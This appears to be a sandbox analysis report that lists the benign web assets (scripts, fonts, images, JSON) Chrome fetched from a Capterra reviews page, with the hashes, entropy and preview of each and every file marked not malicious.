                                                                                                                                                                                                        Entropy (8bit):5.094303402754285
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ZCm/w6kClAgsaFtPrjPFXg5db/oC3AigvNBN6sXIWhBqUkx8Elo9VEMbu3V38Cgg:ZCVClAgsqTj+5db/ki/W4bloXERl38C1
                                                                                                                                                                                                        MD5:C65DB597E762D33246CFBEC56B886523
                                                                                                                                                                                                        SHA1:DE968F5D5A9EBA6F17C47BEECBBAD50430C806C3
                                                                                                                                                                                                        SHA-256:DF3B4F7EE9B54DC67162D74792E3906D8888A0A83068B490FB6830CC6954D5C4
                                                                                                                                                                                                        SHA-512:36B33E0BDFA05937FB86CB2C5E6980CDBAEA9AD08533E50A71B75D8191D068C560957590265220ACEC17E838A3C3E3D1E0314A31F3D5DE5E2910705631B1CC08
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[42],{"9OUN":function(e,t,n){"use strict";n.d(t,"e",function(){return createStore}),n.d(t,"c",function(){return combineReducers}),n.d(t,"b",function(){return bindActionCreators}),n.d(t,"a",function(){return applyMiddleware}),n.d(t,"d",function(){return compose});var r=n("hE+J"),o=function randomString(){return Math.random().toString(36).substring(7).split("").join(".")},i={INIT:"@@redux/INIT"+o(),REPLACE:"@@redux/REPLACE"+o(),PROBE_UNKNOWN_ACTION:function PROBE_UNKNOWN_ACTION(){return"@@redux/PROBE_UNKNOWN_ACTION"+o()}};function isPlainObject(e){if("object"!==typeof e||null===e)return!1;for(var t=e;null!==Object.getPrototypeOf(t);)t=Object.getPrototypeOf(t);return Object.getPrototypeOf(e)===t}function createStore(e,t,n){var o;if("function"===typeof t&&"function"===typeof n||"function"===typeof n&&"function"===typeof arguments[3])throw new Error("It looks like you are passing several store enhancers to createStore(). This is not suppor
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48
                                                                                                                                                                                                        Entropy (8bit):4.238521032323434
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:SXKVWoMLHWORqhjvn:S0XUW/hjvn
                                                                                                                                                                                                        MD5:71CF3E2BE671905600CB625F50F60495
                                                                                                                                                                                                        SHA1:5A97DF8D71E04041FA1C7555EA1E1353A7592836
                                                                                                                                                                                                        SHA-256:5604129133A2E8D715C58D33C9EC19CA6FEDA3F8198F62E8AE290F6D09006CB6
                                                                                                                                                                                                        SHA-512:3EEFB247A4C8D14FDD731DDBC6A93DF44289E7BCEFEEA764C722CB3C68474CCE8803E56EC8DC8802056A087630C65604538BC3051106993921625FF35AA292B5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:Error setting up clientRequest body reader: EOF.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5608
                                                                                                                                                                                                        Entropy (8bit):7.425550252952861
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jdc5N26MT0D5MdtbZPAVwzVHl88jTXyMi3QT+nn37VTSuEGNm:+0RcoYNMtKw/8oTXyMxT+nn37VTSu9w
                                                                                                                                                                                                        MD5:1659ADC2AB86358387F49B332AC6D3D1
                                                                                                                                                                                                        SHA1:960CC18D8C4AB12319C9AF275DAD4660B537D14B
                                                                                                                                                                                                        SHA-256:D05822280CE5FC0F635A0AB6533393881E2202212F0AC78175FA6EFEC5B1AE64
                                                                                                                                                                                                        SHA-512:CBB0F9BA7653A0FCCADA1D90A5A55169BFEA5FD5154A304A6AD5295999828CBCDDA9A53CA2BB80674E74A0F2EC3F0624763FAE098384D675FC599640C7BA714E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/3f97e69e-54a0-4b38-95b7-c226481cff4c.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o...y...(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11808), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11808
                                                                                                                                                                                                        Entropy (8bit):5.094303402754285
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ZCm/w6kClAgsaFtPrjPFXg5db/oC3AigvNBN6sXIWhBqUkx8Elo9VEMbu3V38Cgg:ZCVClAgsqTj+5db/ki/W4bloXERl38C1
                                                                                                                                                                                                        MD5:C65DB597E762D33246CFBEC56B886523
                                                                                                                                                                                                        SHA1:DE968F5D5A9EBA6F17C47BEECBBAD50430C806C3
                                                                                                                                                                                                        SHA-256:DF3B4F7EE9B54DC67162D74792E3906D8888A0A83068B490FB6830CC6954D5C4
                                                                                                                                                                                                        SHA-512:36B33E0BDFA05937FB86CB2C5E6980CDBAEA9AD08533E50A71B75D8191D068C560957590265220ACEC17E838A3C3E3D1E0314A31F3D5DE5E2910705631B1CC08
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/42.f634da7c.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[42],{"9OUN":function(e,t,n){"use strict";n.d(t,"e",function(){return createStore}),n.d(t,"c",function(){return combineReducers}),n.d(t,"b",function(){return bindActionCreators}),n.d(t,"a",function(){return applyMiddleware}),n.d(t,"d",function(){return compose});var r=n("hE+J"),o=function randomString(){return Math.random().toString(36).substring(7).split("").join(".")},i={INIT:"@@redux/INIT"+o(),REPLACE:"@@redux/REPLACE"+o(),PROBE_UNKNOWN_ACTION:function PROBE_UNKNOWN_ACTION(){return"@@redux/PROBE_UNKNOWN_ACTION"+o()}};function isPlainObject(e){if("object"!==typeof e||null===e)return!1;for(var t=e;null!==Object.getPrototypeOf(t);)t=Object.getPrototypeOf(t);return Object.getPrototypeOf(e)===t}function createStore(e,t,n){var o;if("function"===typeof t&&"function"===typeof n||"function"===typeof n&&"function"===typeof arguments[3])throw new Error("It looks like you are passing several store enhancers to createStore(). This is not suppor
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9830
                                                                                                                                                                                                        Entropy (8bit):7.97260517465783
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:20ro92ahIEtKkPBIHbXIMGG4JQayGm307fO0K59biUm7Srs+nHBlWysj:6phhIkK0dJjmk720giIHu
                                                                                                                                                                                                        MD5:7232E264BAFA35308575A262E01E4D18
                                                                                                                                                                                                        SHA1:3F53CE80458402E0F15496880A843E90A8379D91
                                                                                                                                                                                                        SHA-256:840C0F8D5BB2E9277CABDF7B3EA5540FB287FAE6474BF586158D30D23966BB63
                                                                                                                                                                                                        SHA-512:EBF75B5A548745989D42C17963B87BCAC176E986C60C6E9FE0805389A94F14D96D24E678132AE0E3AC69BD377A69EEE75C47619C4ED450DDBBB4ECBBAF3464A8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB....... .IDATx^.}.|\U...w.I.ni.ni2i..b.....>V.(.....UAE.......=...=q....h.,....-..Q)e...6-i...2s........d2..B.6..g...s.=.........c..b...rwi.r... ...g.XL@P.0.#....#.M.E.,m7.nj#..1..1..P....5.B..,J.f.Nk....w....h;k._.......}.3``..,.....f.I'.@..7.....5q..!.K....N.x@..6..1.@.5...L._....q.qE........b...1..........G.9G...g...c...v>?.Q......2.#.....j.&.\o....N...k..,ln..o.."D..i..{..[.D"...=1\. Z..+.\k}[U.{0N0........kb..5.....^^...~n.g... .vxx.......<.~\.....k..T*...../.8x~cz..e+&.W..b......" ....*.e:.4Z.}...v...M....]~.c..t.?T...q...T~..E....`f[...#.....z*.0.,.../.N...(\.".&A..+,..t.i...R.....f.z.9.\...W\..}.{j.....-..@...<.."\..AY.1F1...M....x......3.E....h.W..[C....^.#.m....f..............,......^..^Kd/......./..@.>..........h..@....4c7e.x..m.39_...l.%e./uc.a......N.pA6.zl...t.9.."<.p>........]..v...8..0...Y..L:.=.>J....kp{U...R.f#...s...56."....O........9.z...v.r....6.7.....|U{e.1.0f....9.._I.........;.B.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                        Entropy (8bit):4.482895473332138
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:OUwyhGAtwy7XEIoSeMTHx/M0RAXUwyhGAtwy7XEIoSF2d9n:CV0THxSV79n
                                                                                                                                                                                                        MD5:48ED5F327529B03F3B28124914ABC01E
                                                                                                                                                                                                        SHA1:03D06ED7E0FD79E24E08B9EDFB72947ABA1CA6AB
                                                                                                                                                                                                        SHA-256:C5151F726E4131B632605FB3E80552C0EB25EB55143CC4A065D19D9BD2AE5A8F
                                                                                                                                                                                                        SHA-512:24C856F424D86C085BBC7A4358F93E26A85D4F5CAD6C58FFF0D41B2FF7102624A2071375F84AD243F23FACB0050962A2C6E6028A5CD4081173DF2780762F4D29
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/css/09c885b096621154.css
                                                                                                                                                                                                        Preview:.capterra-hero_capterra-hero--wrapper__Q_Miw{position:relative}@media(min-width:768px){.capterra-hero_capterra-hero--wrapper__Q_Miw{z-index:79}}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11987
                                                                                                                                                                                                        Entropy (8bit):4.5861644474244025
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:RgxcTkFr6oGzjRrXdJmYAz3xnYxm5QSO7LaOkeeY6NJHj8lyXT7mEsWFC/vpXYt0:ixc2kJmJz3xZ5SJNKNy+aEf4pIb+iyp
                                                                                                                                                                                                        MD5:8CF9A7A278C4BEB3BCB28FFF2789AA84
                                                                                                                                                                                                        SHA1:412190BE51B3D94E279E882B212BC2B80178B613
                                                                                                                                                                                                        SHA-256:6A734C88FA59E21CBA702F37DCEBDCC4426C1BC065DA34274B4B99DC93509459
                                                                                                                                                                                                        SHA-512:F169EABDB390E711D49517B59358D6EDF7E9F88F28AA68751E8B93AEBE56AC65EC6C9650DDD7AB6901A3A2869B2608206DC1E6ACFF224838A74E5DB34362E5F5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:var sa_tracking = (function () {. var storage = {};. const brands = [. {. name: 'capterra',. searchTerm: 'capterra',. },. {. name: 'capterra',. searchTerm: 'capstage',. },. {. name: 'getapp',. searchTerm: 'getapp',. },. {. name: 'getapp',. searchTerm: 'gappdev',. },. ];. return {. _applySourceMediumHack: (applySourceMediumHack = (sessionData) => {. if (. sessionData.gclid !== '-' &&. sessionData.ga_source === '(direct)' &&. sessionData.ga_medium === '(none)'. ) {. sessionData.ga_source = 'google';. sessionData.ga_medium = 'cpc';. }.. if (sessionData.referrer_partner_id) {. const a = document.createElement('a');. a.href = sessionData.referrer_url;. sessionData.ga_source = a.hostname;. sessionData.ga_medium = 'affiliate';. }. return sessionData;. }),.. _getCookie: (getCookie = (name) => {. const v = document.cookie.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41172
                                                                                                                                                                                                        Entropy (8bit):5.505998162296305
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
                                                                                                                                                                                                        MD5:0AA5002702487976D570A640C408EBA5
                                                                                                                                                                                                        SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                                                                                                                        SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                                                                                                                        SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3034)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):279974
                                                                                                                                                                                                        Entropy (8bit):5.560977241938688
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:v3SAdB6si3wbWl6j4zCl0ztNAJ0kDzOJfjU7iMNy:viAv6sgwbACYknk
                                                                                                                                                                                                        MD5:5B5BD4AE10501772C87993E25E29327B
                                                                                                                                                                                                        SHA1:831C61B74F8852EF506A31A36945B0257F8787F7
                                                                                                                                                                                                        SHA-256:7ABEF919D7A7BC5B2E97847E0BAC05AB561341FE77FA4BADAD393A33FCEF1B04
                                                                                                                                                                                                        SHA-512:8B205D67A33B8409BCEF9EED7D2F30B9CD68D0B83B9D5E88B34C18D63E201A40FF252D16DD30CF2F2C4B4C185DEB18BFA386630175702DCE0CFAC3A6EB61B023
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-JL3QGDSQZ4&l=dataLayer&cx=c
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":1,"function":"__c","vtp_value":1}],. "tags":[{"function":"__gct","vtp_trackingId":"G-JL3QGDSQZ4","vtp_sessionDuration":0,"tag_id":1},{"function":"__ccd_em_outbound_click","priority":0,"vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":3},{"function":"__ccd_em_download","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":5},{"function":"__ccd_em_video","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":6},{"function":"__ccd_em_site_search","vtp_searchQueryParams":"q,s,search,query,keyword","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":7},{"function":"__ccd_em_scroll","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":8},{"function"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11987), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11987
                                                                                                                                                                                                        Entropy (8bit):5.256756846275912
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:BT5RzC7YdVCtkFRKCrBcCp6bbPHCfzICp1CApUwvCK/AvoBQtCYn4zMCpZmT3jZL:oKVCNCACzCAN7/koWtCcCIj5
                                                                                                                                                                                                        MD5:C71E6869F6177E1A8F3F1BAE94F3F1B8
                                                                                                                                                                                                        SHA1:234686A7B9DA10634AC2FC6CE40BBD9EDB8639A0
                                                                                                                                                                                                        SHA-256:1348C446652C07696CA6C19383A2DDC534091E5DE8FD251E726CFA0FA4CDC234
                                                                                                                                                                                                        SHA-512:61B7D5A791AC5A46B69805369B91CF28A3E483D6E7B3A3506CE655A434E11224BDD6ACE90831475A6A27E8FEF7F522736041572A4E5AA60DE48C1F926A138738
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/630-a3c3b2c58b5440d6.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[630],{65313:function(e,t,r){"use strict";r.d(t,{Z:function(){return p}});var n=r(2784),o=r(2550),l=r(16734),i=r(25632),a=r(85194),c=r(1993);function u(e){return(u="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}var s=["className","children","color","gapless"];function f(){return(f=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}function d(e,t,r){var n;return(n=function(e,t){if("object"!==u(e)||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!==u(n))return n;throw TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(t,"string"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 36848, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):36848
                                                                                                                                                                                                        Entropy (8bit):7.995112872818791
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:57Wc/aUQVBlB85eA5/ULxb14Nv3zyMfD9zriUE2knMVQu:57WYWVBlBj2/UVRchr62kMVQu
                                                                                                                                                                                                        MD5:3CCD9AB2050B2F26898B77AF9148B8E2
                                                                                                                                                                                                        SHA1:7F9F46B2FB3F121F3C0600E1182D725B1BE6C176
                                                                                                                                                                                                        SHA-256:258F9F1B553BB57419619F41D3B1445226C7BC63D2A3409EFEF4A68426709E94
                                                                                                                                                                                                        SHA-512:6F9F764D77A563A132E952BD49790F22AA80A88F885BB9AA82F1C25BBC9FBA1451F3E4FADD1EABDF86DC77F7FCDC13C5B183AEE617077F3061E04D54E7246AFE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu0-K4.woff2
                                                                                                                                                                                                        Preview:wOF2..............*....~.................................J?HVAR.".`?STAT.\'2.../l.....,.A....0..4.6.$..8. .....8..[..Q#.....m..A......N.2Y......6.....e..iIe.m.KZ......=...,.....-+..6"..s.j..23.+.Y.vY....YX'.w^N..@...-mu....!...9.i....DS.=....>.a.t.Q,\t..G.2!.....[../S........D..A&.8...!.A.7K+2Q.c....D..._..i....*..J(f=7...C.[..n6.B....B.t.z4C.T+...b...!.B..x..*r>D....q.C......9.Z....?....{./.......D#..N..O]+..5.5.......{".l.XD...,."a.l0bD..FcD].W..^.qzQ.^.uMA...>h.0.K=.4..h.....T..mG.+.........n+_DG..I.GT..B..igd.X.!u.n&U.;.C.~S.........d....h..{.... .. ..KL...!N.$..5.a.SN......6.=}j.HJ:J.pG.n.~b.AOS..'.T....G.........E.]..O\...|.p/...l..-.i4?....J*0..y.........N.O....3.4&ql...t.T.......I..q..$..........i.n..m..O...v....P.m!...........K...M....r.6Q......:E..$.D>.it...h..>B...R..~.NmF.....x{1`.c..[brR..T....%..\.wz.^..V...?..YG^...eok....b.uu.V.ZqP`.04,.^..L.K.l....i......%Vj..'.0...o..g.....w7z..i`8R.Cj........V.HV.;..w.Qg......pY...b.3$
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23352
                                                                                                                                                                                                        Entropy (8bit):5.126933898925797
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:KMXPXXW3zXFWagTV8lljsV/TeWrtfCux2WqlJWidaQcmmGveU54xumc1Xwpb47cL:x/MzVJIylZsVreYtCI21fNdaQcRGveik
                                                                                                                                                                                                        MD5:5AA8274FCB2D8CD623B3F93447282893
                                                                                                                                                                                                        SHA1:62434F1FA4D99A092E253F2C075876A8FEA7631A
                                                                                                                                                                                                        SHA-256:C4C771FF26BD4F3D0CADFDF0781507CFADD8921C521D51391399CFAA4A952B7B
                                                                                                                                                                                                        SHA-512:F46C84AC8E6DCAE6098B621ADFF0BEDB933EA59C216517B5851E18038F60BBDE1B9FD036206F008640EB610424F95D85E5C2D84BC4FA1DBB74F2E901BF9463ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"products":[{"_id":"885b2837-e739-4034-bcbf-a6d200b49f49","countOfOpenNeeds":2,"countOfPublishedReviews":20348,"logoUrl":"https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/90cac4f1-9eba-4d30-9949-91da634d4da5.png","name":"QuickBooks Enterprise","published":{"Capterra":true,"GetApp":true,"SoftwareAdvice":true},"vendorName":"Intuit","supportedLanguages":{"zu":false,"en":true,"fr":true,"es":true,"it":true,"zh":true}},{"_id":"8c7f8bf5-dbf6-47ee-9df7-a6d200b64092","countOfOpenNeeds":2,"countOfPublishedReviews":18489,"logoUrl":"https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/f11ea590-5812-4ce0-a108-3837d065513d.png","name":"Salesforce Sales Cloud","published":{"Capterra":true,"GetApp":true,"SoftwareAdvice":true},"vendorName":"Salesforce","supportedLanguages":{"zu":false,"fr":true,"ru":true,"sv":true,"it":true,"de":true,"en":true,"es":true}},{"_id":"55deb199-2462-4df1-997d-a78a00b635e4","countOfOpenNeeds":2,"countOfPublishedReviews":15643,"logoUrl":"https://gdm-catalog-fmapi-prod.img
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 96x96, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1855
                                                                                                                                                                                                        Entropy (8bit):7.642738006118502
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:6t5Wz7dQpLnjr3xAhovkTHPsHUTQZRYB9d:cE/2pLX336HUHUQZk9d
                                                                                                                                                                                                        MD5:4BF8094E08987C08C4BFBB0719DD0E06
                                                                                                                                                                                                        SHA1:77DE0DE743ABFAF173BE8A6EBE5BEFEDBAE5CA33
                                                                                                                                                                                                        SHA-256:D3A4CB4B73CAEE4A769CEF572CE126123A6B7E712D2C7DE79515109998D1374A
                                                                                                                                                                                                        SHA-512:96111A6CE44AEC458756484586831C807DBC84DE87C389B8434619F4FA54DFFDF2EE2FAB40BDD459A39B283BADBA6C40FBAD0F6EBAE8C87B0AFAA655BD691DFB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\......`.`.."..........4..................................................................`."@..Is>.aY.{.<w<})s.Fb.y.M`...&.. u6mcr..l.V.F..Rs..i;.g..x.s>-.3..w:.{..,.......W:......S...qf.3.V./.@.,..r.Vd....!.-w...).Kq..&..$...0....?.........................!...AQa. "1.2Rq......0BScr....#46@bs........?.......l..l...F.U.",6K.+3.).r..j...q.J./.[..P.<...."...dP...O.....5...*....8.I.Z.\...!!..pnB<.r<...R...)JJ...R;.9.-r..{.Fm..d.......p.....z}.d8.m.yDy....i...b.:"Q.....=9{.tt.L.Hn$.~I)y .m6...e..mU....)...I..w.8....QdQ...q,...=.4..[...y...%.....H?v....j.B.{.$.Z.V.U...S..?.?U#...RT.I..A....#..]]...p....p.Z..>$[M..n.J...u..G.FA..[E...?.......A......'.5.I..I8..$..Z.....zlG..ki..K;Dxcm6KB.T.. ..q.r.....D..q.A.o8..C...<......H^._..'F..x......;....p...>.....B...d.j....B.}..m.:8....T.#a"Kq.....q=..... Q.\
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (45809)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):45810
                                                                                                                                                                                                        Entropy (8bit):5.4018992831833454
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:5CXgv9mZHawT5khQvzl4P7xdHd32t1EGkLu+6QStSplSruqEmm1LiIPTgqqXyzc9:d+H99khQbmct6nLu+HIruYvL
                                                                                                                                                                                                        MD5:F8E18E23484E55C313A4A8F8615359CA
                                                                                                                                                                                                        SHA1:CFE4D85935005C68FF04B58E236BCED0B0A41D7B
                                                                                                                                                                                                        SHA-256:3F0166BDE3365C67AEEB6ADFB6DE569399BA9941A39EE0EE6C4DC086494DAF99
                                                                                                                                                                                                        SHA-512:CFCAF01D483D6B6CFE9E165D1CA87CB720823087E20E5351C032AE7142E4A599384AB8D034949255ADA8D46FE6F3F66F13E4612A060B7EE036F1121111738F9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(function(){function Dt(e,r,a,o,c,u,g){try{var _=e[u](g),s=_.value}catch(f){a(f);return}_.done?r(s):Promise.resolve(s).then(o,c)}function Ut(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(s){Dt(u,o,c,g,_,"next",s)}function _(s){Dt(u,o,c,g,_,"throw",s)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Tr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (53860), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):53860
                                                                                                                                                                                                        Entropy (8bit):5.191917691339744
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:er9yGOUCyJ/Ep6mzmY+/XC5t3oZYDKNvNr/99fbrJzoHE:erb++/y5t3oZYDANr/XfbFoHE
